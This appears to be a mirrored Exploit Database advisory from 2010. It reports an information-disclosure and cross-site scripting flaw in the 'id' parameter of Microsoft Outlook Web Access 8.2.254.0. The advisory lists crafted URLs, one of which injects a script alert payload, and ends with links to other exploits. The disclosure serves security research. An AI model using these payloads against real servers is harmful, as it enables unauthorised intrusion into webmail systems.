Microsoft Outlook Web Access (OWA) 8.2.254.0 – Information Disclosure

Exploit Database
14 阅读

作者： Praveen Darshanam

日期： 2010-05-24
类别：
- webapps
平台：
- windows
来源：https://www.exploit-db.com/exploits/12728/

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

"Microsoft Outlook Web Access (OWA) version 8.2.254.0"

OS: Windows Server 2003

Internet Explorer 7

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

There is an information disclosure vulnerability in "Microsoft Outlook Web
Access (OWA) version 8.2.254.0".

The issue is with the id parameter.

Following are different exploitation techniques:

https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script<https://example.com/owa/?ae=Folder&t=IPF.Note&id=%3cscript%3ealert(%22HHH%22)%3c/script>
>

https://example.com/owa/?ae=Folder&t=IPF.Note&id=

https://example.com/owa/?ae=Folder&t=IPF.Note&id=A



Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA

last Exploits
Microsoft Outlook Web Access (OWA) 8.2.254.0 – Information Disclosure的更多信息

Splunk Enterprise – Information Disclosure：
HP OpenView Network Node Manager (OV NNM) 7.53 – ‘OvJavaLocale’ Buffer Overflow：
Microweber 0.905 – Error-Based SQL Injection：
SiteGenius – Blind SQL Injection：
OpenEMR – ‘site’ Cross-Site Scripting：
WordPress Plugin All-in-One Event Calendar 1.4 – ‘box_publish_button.php?button_value’ Cross-Site Scripting：
WordPress Plugin WP Mobile Detector 3.5 – Arbitrary File Upload：
phpEnter 4.2.7 – Cross-Site Request Forgery (Add New Post)：